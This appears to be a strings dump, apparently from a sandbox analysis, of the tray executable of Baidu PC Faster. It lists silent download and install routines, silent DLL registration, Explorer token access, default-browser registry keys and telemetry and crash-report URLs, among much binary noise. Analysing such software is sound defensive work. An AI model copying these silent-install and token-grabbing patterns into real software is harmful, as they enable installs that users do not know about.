add %s to http request header
ConstructUrl, pszIn: "%s", pszExtraInfo: "%s"
ConstructUrl, pszIn: "%s", pszExtraInfo: "%s"
Error %u in WinHttpCrackUrl
Error %u in WinHttpCrackUrl
Url len: %u
Url len: %u
ConstructUrl, url: "%s"
ConstructUrl, url: "%s"
CDownloadDlg::OnInitDialog, m_bShowTrayIcon: %d
CDownloadDlg::OnInitDialog, m_bShowTrayIcon: %d
On_UM_TRAY, wParam: %d, lParam: %d
On_UM_TRAY, wParam: %d, lParam: %d
Install progress: %d
Install progress: %d
Download progress %d%%
Download progress %d%%
UPDATE_STATUS_INSTALL, g_MiniSetupMan.m_bShowInstall: %d, m_bShowTrayIcon: %d
UPDATE_STATUS_INSTALL, g_MiniSetupMan.m_bShowInstall: %d, m_bShowTrayIcon: %d
partner.zip
partner.zip
inst dir "%s" not exist
inst dir "%s" not exist
custom_action.xml
custom_action.xml
run_exe
run_exe
-install_cell_dict_from_file "%s"
-install_cell_dict_from_file "%s"
CellDictUpdator.exe
CellDictUpdator.exe
Unknown action: %s
Unknown action: %s
Baidu_Secure_SystemUp_%s
Baidu_Secure_SystemUp_%s
Failed to create file "%s", error code: %d
Failed to create file "%s", error code: %d
_.xml
_.xml
Save it to File "%s"
Save it to File "%s"
md5: %s, md5 re-computed: %s
md5: %s, md5 re-computed: %s
okernel32.dll
okernel32.dll
SystemInformation.exe
SystemInformation.exe
DesktopCleaner.exe
DesktopCleaner.exe
Right-ClickMenuManager.exe
Right-ClickMenuManager.exe
DefaultPrograms.exe
DefaultPrograms.exe
FileShredder.exe
FileShredder.exe
FileRecovery.exe
FileRecovery.exe
InternetSpeedTest.exe
InternetSpeedTest.exe
FacebookRepair.exe
FacebookRepair.exe
InternetRepair.exe
InternetRepair.exe
LSPRepair.exe
LSPRepair.exe
FlashPlayerRepair.exe
FlashPlayerRepair.exe
IEProtect.exe
IEProtect.exe
GameFaster.exe
GameFaster.exe
BCloudScan.exe
BCloudScan.exe
AndroidStore_Setup.exe
AndroidStore_Setup.exe
PCAppStore_Setup.exe
PCAppStore_Setup.exe
WifiHotspot.exe
WifiHotspot.exe
PowerMaster.exe
PowerMaster.exe
LargeFilesCleaner.exe
LargeFilesCleaner.exe
DiskDefrag.exe
DiskDefrag.exe
LeakRepairTool.exe
LeakRepairTool.exe
hXXp://download.pcfaster.baidu.com/%version%/baidu_install/%filename%
hXXp://download.pcfaster.baidu.com/%version%/baidu_install/%filename%
DOWNLOAD_SERVER_URL
DOWNLOAD_SERVER_URL
%filename%
%filename%
ComponentDownloadInit: SHCreateDirectory(%s) failed with error code(%d).
ComponentDownloadInit: SHCreateDirectory(%s) failed with error code(%d).
ComponentDownloadInit: DeleteFile(%s) failed with error code(%d).
ComponentDownloadInit: DeleteFile(%s) failed with error code(%d).
ComponentUnpackFile: InFile_OpenW failed with error code(%d).
ComponentUnpackFile: InFile_OpenW failed with error code(%d).
eComponentUnpackFile: failed with error code(%u).
eComponentUnpackFile: failed with error code(%u).
e"%s" /S
e"%s" /S
ComponentInitConfig: ComponentFindNameById failed(ComponentId=%u).
ComponentInitConfig: ComponentFindNameById failed(ComponentId=%u).
gComponentInitConfig: OpenEvent failed(EventName=%s).
gComponentInitConfig: OpenEvent failed(EventName=%s).
ComponentInitConfig: OpenFileMapping failed(FileMapName=%s).
ComponentInitConfig: OpenFileMapping failed(FileMapName=%s).
gComponentInitConfig: MapViewOfFile failed(FileMapName=%s).
gComponentInitConfig: MapViewOfFile failed(FileMapName=%s).
gComponentDoWork: ComponentDownloadFile failed(FileUrl=%s).
gComponentDoWork: ComponentDownloadFile failed(FileUrl=%s).
kComponentDoWork: ComponentInstall failed(File=%s).
kComponentDoWork: ComponentInstall failed(File=%s).
kComponentDoWork: ComponentUnpackFile failed(File=%s).
kComponentDoWork: ComponentUnpackFile failed(File=%s).
oComponentDoWork: Success(Downloaded File=%s).
oComponentDoWork: Success(Downloaded File=%s).
kkernel32.dll
kkernel32.dll
PCFShellEx64.dll
PCFShellEx64.dll
PCFShellEx.dll
PCFShellEx.dll
regsvr32.exe /s "%s"
regsvr32.exe /s "%s"
%u.%u.%u.%u
%u.%u.%u.%u
%u.u.u.u
%u.u.u.u
version.xml
version.xml
Uninstall.exe
Uninstall.exe
Communication.dll
Communication.dll
CCommunication::Init, LoadLibrary(Communication.dll), GetLastError=%u
CCommunication::Init, LoadLibrary(Communication.dll), GetLastError=%u
CCommunication::Init, GetProcAddress(CreateObject), GetLastError=%u
CCommunication::Init, GetProcAddress(CreateObject), GetLastError=%u
CCommunication::Init, fnCreateObject(ICommunication), GetLastError=%u
CCommunication::Init, fnCreateObject(ICommunication), GetLastError=%u
CCommunication::DownloadFile, Communication.Init()
CCommunication::DownloadFile, Communication.Init()
CCommunication::DownloadFile, Communication.SetProxyConfig(%u)
CCommunication::DownloadFile, Communication.SetProxyConfig(%u)
CCommunication::DownloadFile, CreateEvent, GetLastError=%u)
CCommunication::DownloadFile, CreateEvent, GetLastError=%u)
CCommunication::DownloadFile, ProcessAsyncReq(strUrl=%s))
CCommunication::DownloadFile, ProcessAsyncReq(strUrl=%s))
CreateFile failed, error code: %u
CreateFile failed, error code: %u
WriteFile failed, error code: %u
WriteFile failed, error code: %u
Res Name: %u
Res Name: %u
Res Name: %s
Res Name: %s
Euser32.dll
Euser32.dll
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
0000-0000-0000#0000
0000-0000-0000#0000
000000000000
000000000000
CCommunication::OpenURL, lpUrl=%s
CCommunication::OpenURL, lpUrl=%s
CCommunication::OpenURL, Communication.Init()
CCommunication::OpenURL, Communication.Init()
CCommunication::OpenURL, ProcessSyncReq(strUrl=%s)
CCommunication::OpenURL, ProcessSyncReq(strUrl=%s)
ReportURL
ReportURL
DataReport
DataReport
Failed to MapViewOfFile of %s (error=%d)
Failed to MapViewOfFile of %s (error=%d)
Failed to OpenFileMapping of %s (error=%d)
Failed to OpenFileMapping of %s (error=%d)
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
http\shell\open\command
http\shell\open\command
PCFasterSvc_{PCFaster_4.0.0.0}
PCFasterSvc_{PCFaster_4.0.0.0}
win %u.%u.%u
win %u.%u.%u
CCommunication::SendData, Communication.Init()
CCommunication::SendData, Communication.Init()
CCommunication::SendData, ProcessSyncReq(strUrl=%s)
CCommunication::SendData, ProcessSyncReq(strUrl=%s)
AAdvapi32.dll
AAdvapi32.dll
\Baidu\Common\I18N\conf.db
\Baidu\Common\I18N\conf.db
XXxXXXXXXXX
XXxXXXXXXXX
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Updater.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Updater.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
5.0.4.87531
5.0.4.87531
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
5.1.2600.5512 (xpsp.080413-211
5.1.2600.5512 (xpsp.080413-211
5,0,4,87166
5,0,4,87166
PCFTray.exe_2564:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
mscoree.dll
mscoree.dll
coredll.dll
coredll.dll
%s$x$x
%s$x$x
%s$%x
%s$%x
-60%!<:>
-60%!<:>
$x
$x
;3:'84!<:>
;3:'84!<:>
6666666666666666
6666666666666666
kernel32.dll
kernel32.dll
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
CHECK failed: !iter->second.is_repeated:
CHECK failed: !iter->second.is_repeated:
CHECK failed: ((iter->second).is_repeated ? REPEATED : OPTIONAL) == (OPTIONAL):
CHECK failed: ((iter->second).is_repeated ? REPEATED : OPTIONAL) == (OPTIONAL):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_INT32):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_INT32):
CHECK failed: ((*extension).is_repeated ? REPEATED : OPTIONAL) == (OPTIONAL):
CHECK failed: ((*extension).is_repeated ? REPEATED : OPTIONAL) == (OPTIONAL):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_INT32):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_INT32):
CHECK failed: iter != extensions_.end():
CHECK failed: iter != extensions_.end():
CHECK failed: ((iter->second).is_repeated ? REPEATED : OPTIONAL) == (REPEATED):
CHECK failed: ((iter->second).is_repeated ? REPEATED : OPTIONAL) == (REPEATED):
CHECK failed: ((*extension).is_repeated ? REPEATED : OPTIONAL) == (REPEATED):
CHECK failed: ((*extension).is_repeated ? REPEATED : OPTIONAL) == (REPEATED):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_INT64):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_INT64):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_INT64):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_INT64):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_UINT32):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_UINT32):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_UINT32):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_UINT32):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_UINT64):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_UINT64):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_UINT64):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_UINT64):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_FLOAT):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_FLOAT):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_FLOAT):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_FLOAT):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_DOUBLE):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_DOUBLE):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_DOUBLE):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_DOUBLE):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_BOOL):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_BOOL):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_BOOL):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_BOOL):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_ENUM):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_ENUM):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_ENUM):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_ENUM):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_STRING):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_STRING):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_STRING):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_STRING):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_MESSAGE):
CHECK failed: (cpp_type((iter->second).type)) == (WireFormatLite::CPPTYPE_MESSAGE):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_MESSAGE):
CHECK failed: (cpp_type((*extension).type)) == (WireFormatLite::CPPTYPE_MESSAGE):
CHECK failed: (extension->type) == (other_extension.type):
CHECK failed: (extension->type) == (other_extension.type):
CHECK failed: ((iter->second).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_OPTIONAL):
CHECK failed: ((iter->second).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_OPTIONAL):
CHECK failed: (cpp_type((iter->second).type)) == (FieldDescriptor::CPPTYPE_MESSAGE):
CHECK failed: (cpp_type((iter->second).type)) == (FieldDescriptor::CPPTYPE_MESSAGE):
CHECK failed: ((*extension).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_OPTIONAL):
CHECK failed: ((*extension).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_OPTIONAL):
CHECK failed: (cpp_type((*extension).type)) == (FieldDescriptor::CPPTYPE_MESSAGE):
CHECK failed: (cpp_type((*extension).type)) == (FieldDescriptor::CPPTYPE_MESSAGE):
CHECK failed: ((*extension).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_REPEATED):
CHECK failed: ((*extension).is_repeated ? FieldDescriptor::LABEL_REPEATED : FieldDescriptor::LABEL_OPTIONAL) == (FieldDescriptor::LABEL_REPEATED):
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
CHECK failed: backup_bytes_ == 0 && buffer_.get() != NULL:
CHECK failed: backup_bytes_ == 0 && buffer_.get() != NULL:
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
com.google.protobufB
Error reporting not implemented.
Error reporting not implemented.
\xx
\xx
google::protobuf::strings::CHexEscape
google::protobuf::strings::CHexEscape
google::protobuf::JoinStringsIterator
google::protobuf::JoinStringsIterator
CHECK failed: !coded_out.HadError():
CHECK failed: !coded_out.HadError():
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageError
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageError
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageTypeError
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageTypeError
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageEnumTypeError
google::protobuf::internal::`anonymous-namespace'::ReportReflectionUsageEnumTypeError
%d.%d.%d
%d.%d.%d
libprotobuf %s %s:%d] %s
libprotobuf %s %s:%d] %s
import "$0";
import "$0";
$0$1 $2 $3 = $4
$0$1 $2 $3 = $4
$0$1 = $2
$0$1 = $2
". To use it here, please add the necessary import.
". To use it here, please add the necessary import.
", which is not imported by "
", which is not imported by "
.placeholder.proto
.placeholder.proto
.PLACEHOLDER_VALUE
.PLACEHOLDER_VALUE
.dummy
.dummy
File recursively imports itself:
File recursively imports itself:
Missing field: FileDescriptorProto.name.
Missing field: FileDescriptorProto.name.
Import "
Import "
FieldDescriptorProto.extendee not set for extension field.
FieldDescriptorProto.extendee not set for extension field.
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee set for non-extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
map_key must not name a repeated field.
map_key must not name a repeated field.
map key must name a scalar or string field.
map key must name a scalar or string field.
" is repeated. Repeated options are not supported.
" is repeated. Repeated options are not supported.
CHECK failed: !out.HadError():
CHECK failed: !out.HadError():
.foo = value".
.foo = value".
CHECK failed: dynamic.get() != NULL:
CHECK failed: dynamic.get() != NULL:
CHECK failed: (from.GetDescriptor()) == (descriptor):
CHECK failed: (from.GetDescriptor()) == (descriptor):
: Tried to copy from a message with a different type.to:
: Tried to copy from a message with a different type.to:
Thread %d: invalid start address X!!!
Thread %d: invalid start address X!!!
%d: BaseThreadStart = X
%d: BaseThreadStart = X
LeakRepair.proto
LeakRepair.proto
.LeakRepair.HOTFIXLEVEL:
.LeakRepair.HOTFIXLEVEL:
.LeakRepair.IGNOREREASON:
.LeakRepair.IGNOREREASON:
strLinkUrl
strLinkUrl
strOfficialDownloadUrl
strOfficialDownloadUrl
.LeakRepair.HOTFIXSTATE:
.LeakRepair.HOTFIXSTATE:
.LeakRepair.LEAKREPAIRTYPE"
.LeakRepair.LEAKREPAIRTYPE"
.LeakRepair.OUTDATA_HEADER
.LeakRepair.OUTDATA_HEADER
.LeakRepair.HOTFIXINFO"1
.LeakRepair.HOTFIXINFO"1
.LeakRepair.HOTFIXIDLIST"n
.LeakRepair.HOTFIXIDLIST"n
.LeakRepair.HOTFIXIDLIST"^
.LeakRepair.HOTFIXIDLIST"^
OUTDATA_GETWINDOWSUPDATESTATE
OUTDATA_GETWINDOWSUPDATESTATE
.LeakRepair.LEAKREPAIRTYPE"M
.LeakRepair.LEAKREPAIRTYPE"M
.LeakRepair.INDATA_HEADER
.LeakRepair.INDATA_HEADER
.LeakRepair.HOTFIXIDLIST
.LeakRepair.HOTFIXIDLIST
.LeakRepair.HOTFIXIDLIST"Z
.LeakRepair.HOTFIXIDLIST"Z
.LeakRepair.LEAKREPAIRTYPE"X
.LeakRepair.LEAKREPAIRTYPE"X
.LeakRepair.NOTIFYDATA_HEADER
.LeakRepair.NOTIFYDATA_HEADER
strNotifyCmd
strNotifyCmd
INDATA_SETWINDOWSUPDATESTATE
INDATA_SETWINDOWSUPDATESTATE
2!.LeakRepair.INDATA_DOWNLOADHOTFIX
2!.LeakRepair.INDATA_DOWNLOADHOTFIX
2 .LeakRepair.INDATA_INSTALLHOTFIX"O
2 .LeakRepair.INDATA_INSTALLHOTFIX"O
.LeakRepair.INDATA_HEADER"Q
.LeakRepair.INDATA_HEADER"Q
.LeakRepair.RETURNCODE"3
.LeakRepair.RETURNCODE"3
MIRRORDOWNLOADURL
MIRRORDOWNLOADURL
strMirrorDownloadUrl
strMirrorDownloadUrl
.LeakRepair.HOTFIXINFO
.LeakRepair.HOTFIXINFO
.LeakRepair.INSTALLCOMMAND
.LeakRepair.INSTALLCOMMAND
MirrorDownloadUrl
MirrorDownloadUrl
.LeakRepair.MIRRORDOWNLOADURL"F
.LeakRepair.MIRRORDOWNLOADURL"F
HOTFIXLEVEL_IMPORTANT
HOTFIXLEVEL_IMPORTANT
LeakRepair::OUTDATA_GETWINDOWSUPDATESTATE::MergeFrom
LeakRepair::OUTDATA_GETWINDOWSUPDATESTATE::MergeFrom
LeakRepair::INDATA_SETWINDOWSUPDATESTATE::MergeFrom
LeakRepair::INDATA_SETWINDOWSUPDATESTATE::MergeFrom
LeakRepair::MIRRORDOWNLOADURL::MergeFrom
LeakRepair::MIRRORDOWNLOADURL::MergeFrom
7438FEF7-71A6-4116-83C0-94C23BF3E228
7438FEF7-71A6-4116-83C0-94C23BF3E228
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
00000000
00000000
google::protobuf::TextFormat::Parser::ParserImpl::ReportError
google::protobuf::TextFormat::Parser::ParserImpl::ReportError
google::protobuf::TextFormat::Parser::ParserImpl::ReportWarning
google::protobuf::TextFormat::Parser::ParserImpl::ReportWarning
u:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFTray.pdb
u:\app\gensoft\security-client\pc-faster\public\output\pdb\PCFTray.pdb
DirectUI.dll
DirectUI.dll
DataReport.dll
DataReport.dll
log2.dll
log2.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
?ReportIncCount@CBaiduStoreMgr@@QAEHK@Z
?ReportIncCount@CBaiduStoreMgr@@QAEHK@Z
?ReportIncCount@CBaiduStoreMgr@@QAEHKK@Z
?ReportIncCount@CBaiduStoreMgr@@QAEHKK@Z
?DoShellExecute@CBaiduStoreMgr@@QAEXV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@0@Z
?DoShellExecute@CBaiduStoreMgr@@QAEXV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@0@Z
?ReportValueEx@CBaiduStoreMgr@@QAEHKPB_W@Z
?ReportValueEx@CBaiduStoreMgr@@QAEHKPB_W@Z
?ReportStateEx@CBaiduStoreMgr@@QAEHKPB_W@Z
?ReportStateEx@CBaiduStoreMgr@@QAEHKPB_W@Z
?PostKrnMsg@CBaiduStoreMgr@@QAEHPB_W0PAXK0@Z
?PostKrnMsg@CBaiduStoreMgr@@QAEHPB_W0PAXK0@Z
BaiduStore.dll
BaiduStore.dll
SHDeleteKeyW
SHDeleteKeyW
SHLWAPI.dll
SHLWAPI.dll
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
WTSAPI32.dll
WTSAPI32.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
PSAPI.DLL
PSAPI.DLL
POWRPROF.dll
POWRPROF.dll
USERENV.dll
USERENV.dll
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVBugReportHelper@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
zcÃ
zcÃ
.?AVCRegKey@ATL@@
.?AVCRegKey@ATL@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKeyBase@@
.?AVOUTDATA_GETWINDOWSUPDATESTATE@LeakRepair@@
.?AVOUTDATA_GETWINDOWSUPDATESTATE@LeakRepair@@
.?AVINDATA_SETWINDOWSUPDATESTATE@LeakRepair@@
.?AVINDATA_SETWINDOWSUPDATESTATE@LeakRepair@@
.?AVMIRRORDOWNLOADURL@LeakRepair@@
.?AVMIRRORDOWNLOADURL@LeakRepair@@
.eYB>
.eYB>
:.UTT$
:.UTT$
\.CD9D
\.CD9D
"""%####
"""%####
@@@#@@@%@@@%@@@#@@@
@@@#@@@%@@@%@@@#@@@
"""%%%%!
"""%%%%!
@@@!@@@%@@@%@@@!@@@
@@@!@@@%@@@%@@@!@@@
77
77
2$272&3 3
2$272&3 3
5 5$5(5,5
5 5$5(5,5
6 6$6(6,606
6 6$6(6,606
6$6(6,606
6$6(6,606
1 2-2 4W5D5P5Z5b5m5
1 2-2 4W5D5P5Z5b5m5
6 6$6(6,60646
6 6$6(6,60646
7&939&:5:
7&939&:5:
1 1$1(1,1014181
1 1$1(1,1014181
3=3
3=3
;>;%
;>;%
31474>4{4
31474>4{4
9%: :@:]:
9%: :@:]:
> ?0?6?{?
> ?0?6?{?
; ;%;1;7;
; ;%;1;7;
:$:,:4:<:>
:$:,:4:<:>
0$1@1\1|1
0$1@1\1|1
explorer.exe
explorer.exe
HTTP/1.1
HTTP/1.1
BugReportConfig.ini
BugReportConfig.ini
ShowBugReport
ShowBugReport
DumpConfig.ini
DumpConfig.ini
_ServerStore.dat
_ServerStore.dat
hXXp://
hXXp://
product=%s;guid=%s;type=%d;
product=%s;guid=%s;type=%d;
/cgi-bin-py/dump_controler.cgi
/cgi-bin-py/dump_controler.cgi
CrashUL.exe
CrashUL.exe
trayreported
trayreported
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
serverreported
serverreported
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
BugReportConfig
BugReportConfig
BugInfoUploadURL
BugInfoUploadURL
hXXp://sync.bav.baidu.com
hXXp://sync.bav.baidu.com
BugURL
BugURL
hXXp://bug.bav.baidu.com
hXXp://bug.bav.baidu.com
Baidu Crash Report
Baidu Crash Report
CrashCallBackExe
CrashCallBackExe
\StringFileInfo\x\%s
\StringFileInfo\x\%s
\StringFileInfo\X
\StringFileInfo\X
c:\crash.ini
c:\crash.ini
ntdll.dll
ntdll.dll
CrashReport.exe
CrashReport.exe
PatchExportTable
PatchExportTable
FPatchMyImportTables
FPatchMyImportTables
%S$%x
%S$%x
public %s
public %s
sub_%0X
sub_%0X
%sloc_%0X
%sloc_%0X
loc_%0X:
loc_%0X:
push %seg
push %seg
pop %seg
pop %seg
setÌ
setÌ
cmovÌ
cmovÌ
66006666
66006666
xmm%d
xmm%d
st(%d)
st(%d)
%s (%0Xh)
%s (%0Xh)
%0Xh
%0Xh
-%0Xh
-%0Xh
%s:%s
%s:%s
%0Xh:%0Xh
%0Xh:%0Xh
%0Xh, %0Xh
%0Xh, %0Xh
BAD ptr %s
BAD ptr %s
oword ptr %s
oword ptr %s
tbyte ptr %s
tbyte ptr %s
qword ptr %s
qword ptr %s
dword ptr %s
dword ptr %s
word ptr %s
word ptr %s
byte ptr %s
byte ptr %s
KERNEL32.DLL
KERNEL32.DLL
%u.%u.%u.%u
%u.%u.%u.%u
PCAppStore.exe
PCAppStore.exe
